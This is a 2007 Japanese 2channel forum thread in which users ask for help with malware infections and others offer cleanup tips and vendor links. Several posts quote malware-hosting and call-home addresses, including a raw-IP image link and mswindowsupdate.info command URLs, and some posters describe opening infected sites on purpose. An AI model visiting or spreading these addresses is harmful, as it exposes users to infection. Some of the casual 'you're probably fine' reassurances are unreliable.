初心者でごめんなさい知っている方いたらご教授願います。


644 :名無しさん@お腹いっぱい。:2007/01/31(水) 00:00:13
>>643
VBS.LoveLetter.A
http://www.symantec.com/region/jp/avcenter/venc/data/vbs.loveletter.a.html

VBS.LoveLetter.A (最新情報)
http://www.symantec.com/region/jp/avcenter/venc/data/vbs.loveletter.a2.html



645 :名無しさん@お腹いっぱい。:2007/01/31(水) 00:05:22
>>643
最新情報の一番下にリンクがあった。

VBS.LoveLetter駆除ツール
http://www.symantec.com/region/jp/avcenter/venc/data/fix.vbs.loveletter.html

646 :名無しさん@お腹いっぱい。:2007/01/31(水) 00:07:15
>>641
実行できる拡張子は決まってるんじゃねーの?
jpegやaviでは実行できないと思うが。
あくまで拡張子は、exeとかscrとかでないと無意味な希ガス。

647 :名無しさん@お腹いっぱい。:2007/01/31(水) 00:09:55
>>643
本スレに誘導しとく
【ノートン】インターネットセキュリティ Ver.105【2007】

>>643の内容情報をそのまま貼り付けてね


648 :名無しさん@お腹いっぱい。:2007/01/31(水) 00:10:50
>>644
大丈夫だったんですねー。こんな初心者に親切にしてくれて有り難う。

649 :名無しさん@お腹いっぱい。:2007/01/31(水) 00:13:09
>>645>>647さんもありがとうございましたー。

650 :名無しさん@お腹いっぱい。:2007/01/31(水) 00:16:47
>>640が新たなセキュリティホール見つけたらしいので跳んできますた

>>642
現物が無いからな

651 :名無しさん@お腹いっぱい。:2007/01/31(水) 00:58:37
>>640
名探偵乙

652 :636:2007/01/31(水) 11:20:05
>>637
有難うございます
トレ×...舎は未対応で最近更新続出ポ

笑みで吸うされるとヤバ〜    m<(_"_)>m

653 :名無しさん@お腹いっぱい。:2007/01/31(水) 11:26:05
jpgやmp3でもバイナリデータが含まれてるものはウィルスと思わせる動きもするしウィルスも発症するだろ

654 :名無しさん@お腹いっぱい。:2007/01/31(水) 16:23:09
>>653
本気で言ってんの?

655 :名無しさん@お腹いっぱい。:2007/01/31(水) 16:24:00
XPなんですが、ネットでエロ画像を見たあとにまたネットを開こうとしたら、「ページが表示されません」になってしまいました。

何回やっても表示しないので、ウィルスに感染したのかなと思いますが、バスターが

「このシステム上で次の疑わしい変更を検出しました。項目を選択し、実行したい処理のボタンをクリックして下さい。」
てかいてあるんですが、そのボタンを押すことができず(画面上の選択肢の部分が白くなってて、ダブルクリックしても反応しない。)、同様に「閉じる」というところも白くなってて反応しません。
こういう場合もう手遅れなんでしょうか?だれかいい方法助けてもらえませんか?

656 :名無しさん@お腹いっぱい。:2007/01/31(水) 17:24:10
>>653
ちょwwwページ開いただけで感染じゃんw

>>655
2007だよね?
ttp://esupport.trendmicro.co.jp/supportjp/viewxml.do?ContentID=JP-2060650

657 :名無しさん@お腹いっぱい。:2007/01/31(水) 17:26:23
タイムマシンが完成したw
これから、過去に戻る実験をしてみる
んじゃ!

658 :名無しさん@お腹いっぱい。:2007/01/31(水) 17:49:00
>>653はバイナリデータとか言って通ぶってみたい年頃なんだろ

659 :名無しさん@お腹いっぱい。:2007/01/31(水) 17:55:41
糞ニーのMP3ウォークマン(テキスト表示も可能らしい)ですが
これに感染可能なウィルスなんて存在しましたっけ

660 :名無しさん@お腹いっぱい。:2007/01/31(水) 18:04:18
ちょw
exciteのトップ行くと
ノートンがウィルス検出してフリーズするんだけど俺だけ?

3回試してみたんだけど毎回反応した

661 :名無しさん@お腹いっぱい。:2007/01/31(水) 18:19:01
>>659
ないよ。

>>660
うん。

662 :名無しさん@お腹いっぱい。:2007/02/01(木) 03:40:52
ふぅ〜。pugyaaaに感染。
大事なファイルは、死守できたから良かったけど、ワンピース295話DLし直しやな。

663 :名無しさん@お腹いっぱい。:2007/02/01(木) 10:15:23
ttp://new-mario.net/

このサイトを見た後にウイルスチェックすると
クッキーにウイルス入ってるって言われるんだけど
これってなんのウイルスなの?

664 :名無しさん@お腹いっぱい。:2007/02/01(木) 13:23:19
>>652
WIN恵美ュ礼ー田で病気ばら撒くなよ!

665 :名無しさん@お腹いっぱい。:2007/02/01(木) 19:08:45
>>646
>>653
Vistaでの事例だからあまり関係ないと思うけど、一応はっとく
これファイルの拡張子はmp3なのかね…

ttp://www.itmedia.co.jp/news/articles/0702/01/news020.html

666 :名無しさん@お腹いっぱい。:2007/02/01(木) 19:14:19
音声コマンド機能が問題なわけね
つまりデータを再生するソフトになんらかの実行権限があるとデータファイルでも安心できないってことかな


667 :名無しさん@お腹いっぱい。:2007/02/01(木) 19:17:50
ついでにこれもはっとく

Vistaの音声コマンド悪用は可能――Microsoftがコメント
http://www.itmedia.co.jp/news/articles/0702/01/news024.html

668 :名無しさん@お腹いっぱい。:2007/02/01(木) 22:15:32
>>666
素人が割り込んで申し訳ないけど、
なんらかの実行権限=ソフトの脆弱性って解釈でおkですか?

669 :666 おいらも素人:2007/02/01(木) 22:29:17
>>668
脆弱性ではないでしょ
もともとvistaの音声認識機能は.cmdを実行できる仕組みになっててそれを悪用しようと思えばできるってことでしょ
ちなみにvistaではUACプロンプト機能でデフォでは音声コマンド機能は使えないようになってるらしいからあくまで可能性の話


670 :名無しさん@お腹いっぱい。:2007/02/01(木) 23:21:49
>>669
悪用される条件が厳しいから、脆弱性というレベルではないってことですか。

では、例えばウイルスファイルの拡張子がjpgであった場合、
画像ビューアでそのファイルを開いた時、コードが実行されてしまったら、
それは、脆弱性によるものと考えておkですか?

671 :名無しさん@お腹いっぱい。:2007/02/01(木) 23:28:56
おkではないです

672 :名無しさん@お腹いっぱい。:2007/02/01(木) 23:48:15
脆弱性 【vulnerability】

コンピュータやネットワークなどの情報システムにおいて、
第三者が保安上の脅威となる行為(システムの乗っ取りや機密情報の漏洩など)に利用できる可能性のあるシステム上の欠陥や仕様上の問題点。
http://e-words.jp/w/E88486E5BCB1E680A7.html

>>670
それはそうでしょ
.jpgは普通画像ファイルを表示する拡張子
それでコードが実行されるのならそれに関連付けられたソフトがどっかおかしい=脆弱性があるってことでしょ

いわゆる0-day attackなんかは脆弱性をついた攻撃だけど
やっぱ.wmfの脆弱性がきっかけとなってマルウェア作者たちがexploitの作成に躍起になってきたのが去年の傾向
だけどソフトの脆弱性はベンダーがアップデートして修正すればオワリだから 個人的にはそんなに心配してないけどね
大事なのはソフトウエアは必ず最新バージョンを使うってこと windowsも然り
ただofficeの脆弱性はパッチでてないのもあるからちょっとヤバイカモ


673 :672:2007/02/01(木) 23:53:02
まあフリーソフトだと最新版のほうがスパイウエアはいってたりするけどねw

674 :名無しさん@お腹いっぱい。:2007/02/02(金) 00:07:26
【使用OS】
ME
【MicrosoftUpdate】
全然してない
【使用セキュリティソフト】
多分なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
WORM_NETSKY.DAM
【どんな症状が出るか】
CPYファイルがやたら増え続ける
【症状が出る前に何をやったか】
昨日カボス導入
【症状を解決しようとどのような処置を取ったか】
とりあえずトレンドマイクロして発見
今これしてる→BitDefender Online Scanner
【その他の質問】
単純に削除しようとしたら使用中で削除できません><

675 :名無しさん@お腹いっぱい。:2007/02/02(金) 00:14:56
>>674
問題外、一番下だけ答える
つSafeMode

676 :名無しさん@お腹いっぱい。:2007/02/02(金) 00:33:22
>>675
Safeモードやってみたけど、それでも使用中で削除できなかった

てか問題外ってことは散々既出だったり?

677 :名無しさん@お腹いっぱい。:2007/02/02(金) 00:35:08
>>676
MEだしなP2P専用機とかなんだよね?

678 :名無しさん@お腹いっぱい。:2007/02/02(金) 00:38:38
>>677
そうだと良かったんだけど、どう見てもメインです( ^ω^)

679 : ◆N9P3SuvBPo :2007/02/02(金) 00:44:33
>678
メイン機でP2Pはお奨めじゃないね。
そもそも、感染後にセキュリティソフトなんて無意味に等しいから。
さらに、WindowsUpdateもやっていない。(去年の7月を最後にサポートは終わりましたが
これまでの分も全然していなかったことですか?)
何かあっても当然のことです。
>セーフモードで該当ファイルの削除は不可
WORM_NETSKY.DAM が削除できないということですよね。
ウイルスの発見場所はどこからですか?
正確にお願いします。

680 :名無しさん@お腹いっぱい。:2007/02/02(金) 01:00:40
WindowsUpdateは最後にしたのが,いつか分からないぐらいしてませんでした

ウイルスの発見場所は
C:\_RESTORE\TEMP
C:\_RESTORE\ARCHIVE
です

681 :名無しさん@お腹いっぱい。:2007/02/02(金) 01:04:26
>>680
クリーンインストール推奨

682 : ◆N9P3SuvBPo :2007/02/02(金) 01:07:42
>C:\_RESTORE\
MEのシステムの復元フォルダ…じゃないよね…。
とりあえず、システムの復元を一旦無効にしてみて。

683 :名無しさん@お腹いっぱい。:2007/02/02(金) 01:12:33
>>672
レスありがと。自分でも調べてみようと思います。

684 :名無しさん@お腹いっぱい。:2007/02/02(金) 01:14:56
質問です。
ttp://85.255.117.131/users/maxx/web/xxx.jpg
↑これ踏んじゃったんだけどスキャン削除だけで大丈夫?
avastはDNSChanger-Kだって言うんだけどぐぐってもよく分からない。
削除前後で何も変わらないから不安。。

685 : ◆N9P3SuvBPo :2007/02/02(金) 01:24:48
>684
踏んでみた。
ウイルスが検出されたが、削除して終わり。
MU最新の状態なら大丈夫だと思う。
心配なら、カスペのオンラインスキャン

686 :名無しさん@お腹いっぱい。:2007/02/02(金) 01:28:42
>>682
紛れもなくMEのシステムの復元フォルダです( ^ω^)

システムの復元を無効にしたら,
C:\_RESTORE\ARCHIVE
C:\_RESTORE\TEMP
両方のフォルダの中身が全て消えました( ^ω^)

とりあえずもう一度ウイルスチェックしてみます

687 :名無しさん@お腹いっぱい。:2007/02/02(金) 01:30:13
>>685
ありがとう。行ってきますー。

688 : ◆N9P3SuvBPo :2007/02/02(金) 01:30:50
>686
ウイルスのチェックが終わったら、復元を有効にすることを忘れるな。

689 :名無しさん@お腹いっぱい。:2007/02/02(金) 02:11:22
先日PCがウィルスにかかりました。
「pugyaaa」という症状なのですが対処方法だれか知りませんか?

690 :名無しさん@お腹いっぱい。:2007/02/02(金) 02:18:53
>>689
P2Pヤメレバカ

691 :名無しさん@お腹いっぱい。:2007/02/02(金) 02:36:11
>>688
チェックした所、他の所に半年前ぐらいから居たウイルスもありました
これは普通に駆除できそうです

というわけで解決しました
ご教授ありがとうございました〜

692 :名無しさん@お腹いっぱい。:2007/02/02(金) 03:39:31
>>684
オイオイ、もうひとつtを削ってくれよ・・・
まあ画像プレビューONにしてたオレも悪いけど

693 :名無しさん@お腹いっぱい。:2007/02/02(金) 03:54:11
先ほどトレンドマイクロのオンラインウイルススキャンしてみたのですが、
JAVA_BYTEVER.AYというウイルスが3つ検出されました。
オンラインウイルススキャンだとどのフォルダにこのウイルスが入ってるか
わからないのですが調べる方法ありますか?
ちなみにファイルとフォルダの検索で探してみましたが見当たらないとの
ことでした。
宜しくお願いします。

694 :名無しさん@お腹いっぱい。:2007/02/02(金) 05:05:20
質問です。ノートンでは検出しなかったのですが
ウィルスチェイサーで検出、治療できたウィルスがあります。
「win32.HLLW.Autoruner」という検出名でした。
ぐぐっても日本語サイトは出てきません。
どんなウィルスだったんでしょうか?

695 :名無しさん@お腹いっぱい。:2007/02/02(金) 09:52:38
自分が悪かったのはわかっています。
自業自得なのですがこのままでは他の人に迷惑をかけてしまうので助けてください。

【使用OS】
XP
【MicrosoftUpdate】
いつ行ってもwebページが真っ白で開かないのでやってませんでした。
感染してからなんとか更新したら前回の更新は2004年7月でした…。
【使用セキュリティソフト】
使っていませんでした。
【ルータの有無】
有(有線)
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
Trojan.Win32.Agent.zq
Trojan-Proxy.Win32.small.ck
【どんな症状が出るか】
・200種類くらいのアドレスを使い大量メール送信が行われていると
 プロバイダがら連絡がありました。
・IEのトップページが海外のセキュリティーソフトを買え!っていうようなのに変わり
 なんか見知らぬソフトが常駐してアラートが出るようになった。
【症状が出る前に何をやったか】
PSP関係のHPを見にいったらWARNNINGのメッセージとソフトの説明が出てその後すぐ


696 :名無しさん@お腹いっぱい。:2007/02/02(金) 09:54:19
【症状を解決しようとどのような処置を取ったか】
ノートン先生の試用版を入れる
→ウイルスバスターでオンラインスキャン。Troj_agent.sadともう1つ何か出たので該当ファイルを削除
→IEも元に戻りスキャンしても何もでなくなった。駆除出来たと思い安心。
→そしてやっぱり重いのでノートン先生削除(ごめんなさい…)
→プロバイダからメール大量送信の連絡
→マカフィーの試用版入れる。セーフモードでスキャンしても出ない。
→ウイルスバスターオンラインスキャン。やっぱり出ない。
→カスペのオンラインスキャンで上記のもの発見。
→駆除方法検索しても海外サイトでうちのソフト買え!とかばっかりだったので該当ファイルを削除
 でもTrojan.Win32.Agent.zqの入ってるwindows\temp\1608796.exeが見つからない。
→カスペでオンラインスキャン。Trojan.Win32.Agent.zqだけになった。
【その他の質問】
Trojan.Win32.Agent.zqの駆除方法がわかりません。
windows\temp\1608796.exe この該当ファイルが見つからないので削除も出来ません。
違う場所に入ったり名前が変わったりするものなのでしょうか?

697 :名無しさん@お腹いっぱい。:2007/02/02(金) 11:57:47
>>696
>Trojan.Win32.Agent.zqの駆除方法がわかりません。
>windows\temp\1608796.exe この該当ファイルが見つからないので削除も出来ません。
>違う場所に入ったり名前が変わったりするものなのでしょうか?

隠し属性かシステム属性が付いてるんじゃない?
windows\tempで、コマンドプロンプトから attrib -h -s * をやってみるとか。

698 :名無しさん@お腹いっぱい。:2007/02/02(金) 13:45:32
失礼します。さきほど
http://www.interq.or.jp/tokyo/yang/lo.htm
というサイトを踏んでしまい、何か変だ?と思い
ノートンでスキャンをしたところ、たくさん検出されました。
数はたくさんありますが、
WScript.KakWorm というものが2つ
Bloodhound.Exploit.6 というものが19こあります。
全てファイルの検疫が正常に完了しました
となっていますが、大丈夫でしょうか?

699 :名無しさん@お腹いっぱい。:2007/02/02(金) 17:57:33
>>698
心配要らないと思います。

700 :名無しさん@お腹いっぱい。:2007/02/02(金) 18:32:38
PC初心者のものです
とある海外のサイトを踏んでしまい、複数のウイルスが検出され、
NODで隔離したんですが、それだけでも大丈夫なのでしょうか?
ちなみに隔離済み-切断と表示されています。

701 :名無しさん@お腹いっぱい。:2007/02/02(金) 18:38:56
>>700
http://pc10.2ch.net/test/read.cgi/sec/1091174837/721
マルチすんなヴォケ

702 :名無しさん@お腹いっぱい。:2007/02/02(金) 20:03:05
>>699
698です。ありがとうございます。


703 :名無しさん@お腹いっぱい。:2007/02/02(金) 20:04:14
Windowsの脆弱性を突くウイルス被害が増加、確実にアップデートを
http://internet.watch.impress.co.jp/cda/news/2007/02/02/14668.html

情報処理推進機構セキュリティセンター(IPA/ISEC)は2日、1月のウイルス・不正アクセスの届出状況をまとめた。
1月の傾向としては、Windows Updateを実施していないユーザーがウイルスに多く感染しているとして、
Windowsやセキュリティ対策ソフトのアップデートを行なうよう呼びかけている

IPA/ISECでは今月の呼びかけを「アップデートは忘れずに!!」として、Windowsやウイルス対策ソフトのアップデート状況が最新であるかを確認することを促している。

2006年12月から2007年1月にかけて、個人からの相談や届出が多く寄せられている「W32/Fujacks」は、Windowsのセキュリティホールを悪用して感染するウイルスで、
Windows Updateを実施していないユーザーが被害に遭っているという
W32/FujacksはWebページを表示しただけでも感染する危険性があるため、対策としてWindowsや各種ソフトウェアのアップデートを確実に実施するよう呼びかけている。



704 : ◆N9P3SuvBPo :2007/02/02(金) 20:12:24
>695-696
該当ファイルを消しただけで解決するとは思えないな。
と言うよりもプロバイダから連絡受けて、なおかつ自分が悪くて
他の人に迷惑をかけてしまうって言ってるのなら
こんなとこに質問する前にリカバリしようって気にはならなかったん?

>【MicrosoftUpdate】
>いつ行ってもwebページが真っ白で開かないのでやってませんでした。
原因はなんだろうね?
ActiveXかJavaScript切ってたからとか。

>【使用セキュリティソフト】
>使っていませんでした。
今回の件は、MU最新+ブラウザの設定次第で予防可能。

>・200種類くらいのアドレスを使い大量メール送信が行われていると
> プロバイダから連絡がありました。
プロバイダのほうも連絡するなら、ついでに何か対処法でも教えてやれよw
って思うのは俺だけじゃないのか。

とりあえずさ、一刻も早く何とかしたいのなら、リカバリして。

>703
たしか「Fujacks系」って主に中華系のサイトに行くと感染できるんだよね。
サポートが終わった9x系のOSでIE直踏みすると確実に感染だよね?

705 :703:2007/02/02(金) 20:18:51
>>704
そうみたいっすね
fujacksはIEの脆弱性を利用してたのか…
道理で中国で爆発的に広がったわけだ

アイコンを「パンダ」にするウイルスが蔓延、Webアクセスで感染
http://itpro.nikkeibp.co.jp/article/NEWS/20070202/260515/

706 :名無しさん@お腹いっぱい。:2007/02/02(金) 20:51:10
>>698
単なるジョーク。
ソース見ても攻撃コードはなかった。検出されたウイルスとやらは、このサイトとは関係ないね。

707 :名無しさん@お腹いっぱい。:2007/02/02(金) 20:57:17
つか最低うpだてくらいはしろよ
このスレの感染者ほとんどやってないだろ

708 :名無しさん@お腹いっぱい。:2007/02/02(金) 21:05:55
693とかそうかも・・・MSJVMの穴でしょこれ

709 : ◆N9P3SuvBPo :2007/02/02(金) 21:26:09
>705
実は一ヶ月くらい前、いや2〜3週間前に、そのFujacksが埋め込まれているサイトに行ったのよ。
たしかTrendmicroにあった。
「このサイトはウイルスコードを含んでいるため、絶対アクセスするな!」って。
間違ってアクセスできないように、アドレスは全角文字ねんてな。

98SE(WU最新)・IE6SP1・マカフィー常駐(自動更新)の環境で行ってみたよw
中華系のサイトが表示された。マカフィーは反応無かった。
もう一度アクセスしてみた。
何とも無いんだけどw もし感染なんかしたら大好きなオマンコ画像が拝めな(ry

>707
いえ、ちゃんとやってる人もいるようですが、操作ミスやP2P関連で
感染しちゃうってパターンもあります。

710 :名無しさん@お腹いっぱい。:2007/02/02(金) 21:31:27
ウイルスに感染するような初心者がP2Pやるなって話だがな。

711 :名無しさん@お腹いっぱい。:2007/02/02(金) 21:41:27
ウィルスに感染するような初心者がP2PしてるおかげでDLし放題

712 :703:2007/02/02(金) 21:48:46
>>709
WHBOYってやつですかw
fujacksはexploitの利用はないと思っていたんですが
サイトによっては既知のexploitを利用してfujacksを自動実行させる仕掛けを仕込んでるところがあるかもしれないですね 



713 : ◆N9P3SuvBPo :2007/02/02(金) 21:54:03
>712
そうそうWHBOYだ。
さらにソース見たらIframeタグが使われていた。
もう1つあったけど、重くて繋がらなかったから断念したよ。

714 :名無しさん@お腹いっぱい。:2007/02/02(金) 21:59:45
>>706
ありがとうございます。698です。
こことは関係なく感染していたなんて・・・。
マメにウイルスチェックするよう心がけます。

715 :名無しさん@お腹いっぱい。:2007/02/03(土) 11:44:19
セキュリhチソフトを入れてなかった俺の自業自得なのですが・・・対処法を教えて欲しいです。

【使用OS】 WINDOWS XP
【MicrosoftUpdate】 してませんでした
【使用セキュリティソフト】 ウイルスバスター(感染後)
【セキュリティソフトの定義ファイルは最新の状態であるか】はい
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
TROJ AGENT.DEL TROJ AGENT.SAD TROJ ZLOB.DSI etc...
【どんな症状が出るか】
起動・動作がもの凄く重くなり、IEに繋ぐと海外のセキュリティサイトに飛ばされて「今すぐインストール」みたいな表示が出ます。
System32フォルダ内のPROTECTOR.EXEが5秒ごとに動作しています(ファイアーウォールにかかりログが残ってます)
それから15分ごとに
ttp://mswindowsupdate.info/good_ip.php
ttp://mswindowsupdate.info/work.php?test=7737&method=get&port=7994&id=1197938880&type=0&winver=Windows%20XP%20Service%20Pack%201&ver=partnership_26
にアクセス命令が出されているようです(感染後にウイルスバスターを入れて確認)

【症状が出る前に何をやったか】
家族で共有しているパソコンでどうやら親父が感染源らしく、俺には原因がわかりません。
ファイルを開いたりはしないと思うので、おそらく感染ページを踏んだものと思われます。

【症状を解決しようとどのような処置を取ったか】
ウイルスバスターを導入してウイルス・スパイボットを駆除
ウイルス発動時刻に作成されたファイルを全削除(comio32.dll、tmp0374.exe等)
サービスからieupdaterを無効に設定
safemodeで起動し、System32/PROTECTOR.EXEを削除
セキュリティホールを検出し、アップデート

【その他の質問】
現在はほぼ感染前と同じ状況になりましたが15分ごとに上のアドレスがファイアーウォールにかかるのと
起動時にinet20216/winlogon.exeが見つかりません。と表示されるのが気になります。
御願いします。

716 :名無しさん@お腹いっぱい。:2007/02/03(土) 12:18:22
>【MicrosoftUpdate】 してませんでした

はぁ・・・・

717 :名無しさん@お腹いっぱい。:2007/02/03(土) 19:00:03
>>715
hijack thisをつかってみてはいかが?
参考サイト置いとくよ
http://www.higaitaisaku.com/hijackthis.html
http://hijackthis.de/

> 起動時にinet20216/winlogon.exeが見つかりません。と表示されるのが気になります。
これで起動できてるのが不思議


718 : ◆N9P3SuvBPo :2007/02/03(土) 20:00:29
>717
>inet20216/winlogon.exe
winlogon.exeの正しいパスはc:\windows\system32\
inet20216/winlogon.exeはマルウェア(CWS系)

>715
ちょっとキツイなこれ…

719 :717:2007/02/03(土) 20:11:01
>>718
失礼しました(汗

720 :名無しさん@お腹いっぱい。:2007/02/03(土) 21:39:50
【使用OS】MacOS10.4
【MicrosoftUpdate】-
【使用セキュリティソフト】ClamXav
【セキュリティソフトの定義ファイルは最新の状態であるか】Yes
【ルータの有無】No
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】2ch上のレスのウィルスコードのみ
【どんな症状が出るか】何も出ない
【症状が出る前に何をやったか】踏むなと言われてるリンクを踏んでしまった
【症状を解決しようとどのような処置を取ったか】ClamXavでHDD全スキャンした
【その他の質問】Macでは動かないウィルスってことなんでしょうかね?特に異常
ありません。

721 : ◆N9P3SuvBPo :2007/02/04(日) 00:02:30
MacってWindowsで動作するウイルスはほとんど動かないよ。
でも保菌はするけどね。

722 :名無しさん@お腹いっぱい。:2007/02/04(日) 02:00:48
>>717
どうもです。早速試してきます

>>718
ここに来るまでにいろいろググって頑張ってみたんだけど無理だった
inet20216/winlogon.exeがマルウェアとかも調べてわかったから削除したわけで

どうやらレジストリもいじらないといけないっぽいけどよくわからないorz

723 :名無しさん@お腹いっぱい。:2007/02/04(日) 03:10:27
【使用OS】 XP pro sp2

【MicrosoftUpdate】 ○

【使用セキュリティソフト】 ×

【セキュリティソフトの定義ファイルは最新の状態であるか】 ×

【ルータの有無】 ○

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
トレンドマイクロオンラインスキャン→異常無し
Ad-Aware→異常無し
YamadaChkTool→「Hostsが改変されています。」メッセージ

【どんな症状が出るか】
hostsファイルに0.0.0.0 avp.ch 〜 0.0.0.0 liveupdate.symantecliveupdate.com の値が書き込まれて、
書き込まれたサイトにアクセスできない。MicrosoftUpdateはできます。

【症状が出る前に何をやったか】
P2Pのファイルの何かを踏んでしまったようです・・・

【症状を解決しようとどのような処置を取ったか】
hosts内の値を削除。hosts自体を削除。値を削除し、読み取り専用にしたhostsを上書き。
上の3つを試してみましたが、いずれも、すぐに書き換えられてしまいます。
どうも、Win32.HLLW.Antinny.6 か、Win32.Mydoom.B に感染し、駆除が中途半端だったようです・・・
ご教授お願いします。

【その他の質問】

724 : ◆N9P3SuvBPo :2007/02/04(日) 03:19:50
>723
明日、YES!プリキュア5見たら
すぐにリカバリだ。

そもそもセキュリティソフト無しでP2Pやるってお前www
まあセキュリティソフトがあっても
偽装された実行ファイルを踏んでもダメだけどね。

725 :名無しさん@お腹いっぱい。:2007/02/04(日) 11:46:25
>>88
kasuあの世いけ

726 :名無しさん@お腹いっぱい。:2007/02/04(日) 13:23:54
ノーガードの猛者が多いなw

727 :名無しさん@お腹いっぱい。:2007/02/04(日) 13:37:04
そうとうセキュリティーに自身があるんだろうな。

728 :名無しさん@お腹いっぱい。:2007/02/04(日) 13:40:55
ダウソにスレあるだろ
そっちでやれよ

729 :名無しさん@お腹いっぱい。:2007/02/04(日) 16:46:44
【使用OS】windows xp homeedition
【MicrosoftUpdate】-
【使用セキュリティソフト】norton antivirus
【セキュリティソフトの定義ファイルは最新の状態であるか】Yes
【ルータの有無】yes
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】何も検出されません
【どんな症状が出るか】右クリックを押すだけで「win fixer」と言うウィルスが反応します
【症状が出る前に何をやったか】特に変なことをやって記憶がないです
【症状を解決しようとどのような処置を取ったか】システム完全スキャンを何度も行った。
【その他の質問】別スレで質問を行ったところ、ここへ誘導されました。
winfixer が邪魔でしょうがないです。どうすれば除去できますか。。
教えてください。

730 :名無しさん@お腹いっぱい。:2007/02/04(日) 16:52:23
【使用OS】 Windows 2000
【MicrosoftUpdate】 ○
【使用セキュリティソフト】 マカティ最新版
【セキュリティソフトの定義ファイルは最新の状態であるか】 はい
【ルータの有無】 たぶん、OK
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 なし
【どんな症状が出るか】 SAService.exe起動失敗しましたというエラーが続出
【症状が出る前に何をやったか】 インターネットラジオを聞いたくらい。あとはわからない。
【症状を解決しようとどのような処置を取ったか】 セーフモードにして、トレンドクリーナーした。
【その他の質問】
これはウィルスなのか、PCが壊れたのかよくわからないです。


731 :名無しさん@お腹いっぱい。:2007/02/04(日) 18:45:27
【使用OS】Windows 2001
【MicrosoftUpdate】 今年に入ってからしていない気が
【使用セキュリティソフト】avast!
【セキュリティソフトの定義ファイルは最新の状態であるか】はい
【ルータの有無】あります
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】何も検出されず
【どんな症状が出るか】
今特になにが起こっているわけではないので、よくわかりませんが
ファイルを検索してみたら.dbxファイルが修正されていました
【症状が出る前に何をやったか】
メールを開いたら、画像へのリンクがあり、慌てて閉じ削除しましたが、じきにカツカツカツピコピコと音がして挙動がおかしくなりました。
【症状を解決しようとどのような処置を取ったか】
再起動、オンラインウィルススキャン、オンラインセキュリティチェック、avast!でのスキャン、修正されたファイルのチェック
【その他の質問】
一時的に挙動が少しおかしくなった以外には、特に何か今自覚症状があるわけではないのですが
.dbxファイルが一様に修正されているという事は何かやられてしまったのでしょうか。
なにがやられてしまったのか、どう対処すればよいのかご教授お願いいたします。


732 :名無しさん@お腹いっぱい。:2007/02/04(日) 18:56:45
マカティとかWindows 2001とか、笑わせてもらってありがとう。

733 :731:2007/02/04(日) 19:07:44
すいませんほんと間違いです。
ひきつづきよろしくおねがいいたします。

734 :名無しさん@お腹いっぱい。:2007/02/04(日) 19:08:26
>>730
マカフィーのサイトアドバイザーの起動トラブルじゃないの?
マカフィースレで聞いた方がいいかも。

735 :名無しさん@お腹いっぱい。:2007/02/04(日) 19:37:36
ウイルス検索でこんなんでましたが→TROJ_HARADONG.AB
さっぱりわかりません

おしえてエロい人

736 :名無しさん@お腹いっぱい。:2007/02/04(日) 20:00:52
>>729
リンク先嫁。
http://pc10.2ch.net/test/read.cgi/sec/1169637313/367

>>735
アンチウイルスの種類ぐらい書くのは常識。
TROJ_HARADONG.AB
役立つ情報なし
tp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FHARADONG%2EAB&VSect=P
亜種の情報
tp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FHARADONG%2EF&VSect=P
tp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FHARADONG%2EAU&VSect=P
亜種はブラウザとノートンのファイルを削除するとのこと。

737 :名無しさん@お腹いっぱい。:2007/02/04(日) 20:13:19
>>734
了解です。聞いてみます。マカフィーとマカティー間違えるなんて、
あせっていますね。

738 :736:2007/02/04(日) 20:32:11
訂正
誤 亜種はブラウザとノートンのファイルを削除するとのこと。
正 亜種はブラウザとノートンのファイルの削除に失敗するとのこと。

739 :名無しさん@お腹いっぱい。:2007/02/04(日) 20:36:54
>>734
ありがとうございました。
解決しました。
しかし、ウィルス対策ソフトが誤作動でウィルスみたいな症状起こすなんて、
最悪です。抗議のメールを大量に送っておきました。

740 :729:2007/02/04(日) 21:37:56
>>736
ありがとうございました!長い間悩んでいましたが見事解決しました。

741 :名無しさん@お腹いっぱい。:2007/02/04(日) 22:50:08
携帯から失礼します
先日とある海外サイトを踏み広告等が出てきたりして
いきなり強制的にデスクトップも変わってしまいました、画面は真っ黒で英字で「Your computer is in Danger!」など書かれています
デスクトップ変更の操作をしようとしても何故か無理でした
一応ウィルスのチェックをしたら感染してたみたいなので駆除しましたが
デスクトップは相変わらずの状態なんです
これもウィルスの影響なのか何なのか…PC初心者なのでよくわかりません
何かわかる方、よろしくお願いします

742 :名無しさん@お腹いっぱい。:2007/02/05(月) 00:08:36
なんかこいつのレスみたことあるような希ガス

743 : ◆N9P3SuvBPo :2007/02/05(月) 00:09:23
>741
初心者なりによく頑張った。
次にすることは、リカバリ。

744 :名無しさん@お腹いっぱい。:2007/02/05(月) 14:23:27
【使用OS】Windows ME
【MicrosoftUpdate】 たぶんしてないと
【使用セキュリティソフト】ウィルスセキュリティ
【セキュリティソフトの定義ファイルは最新の状態であるか】はい
【ルータの有無】あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】なし
【どんな症状が出るか】 ハードディスクアクセスランプがしばらくすると点灯しつづける
【症状が出る前に何をやったか】 ゲームの体験版をやった
【症状を解決しようとどのような処置を取ったか】 ウィルスバスターオンラインでは出ず、X-Cleanerの無料ので
Troj.SVwhostが出たので駆除。
しかしまだハードディスクアクセスランプがしばらくすると点灯しつづけるので、ウィルスセキュリティを買ってスキャンしても出ず。
どうすればいいか解りません。ご教授お願いします。

745 :名無しさん@お腹いっぱい。:2007/02/05(月) 15:03:13
>>744
>【MicrosoftUpdate】 たぶんしてないと
ここはせめてWindowsセキュリティセンターで、「自動」にして最新状態を保ちましょう

タスクマネージャーを立ち上げて、キャプチャソフトでキャプチャして画像upできますか?

746 :名無しさん@お腹いっぱい。:2007/02/05(月) 15:42:25
>>745
どっちもMeには無いだろ…

>>744
とりあえず Microsoft(Windows?)Updateやって最新にして
ProcessExplorer等を使ってプロセス見てみ

747 :745:2007/02/05(月) 16:03:44
MEにはそれすら無いのか・・・

748 :744:2007/02/05(月) 16:05:27
>>745
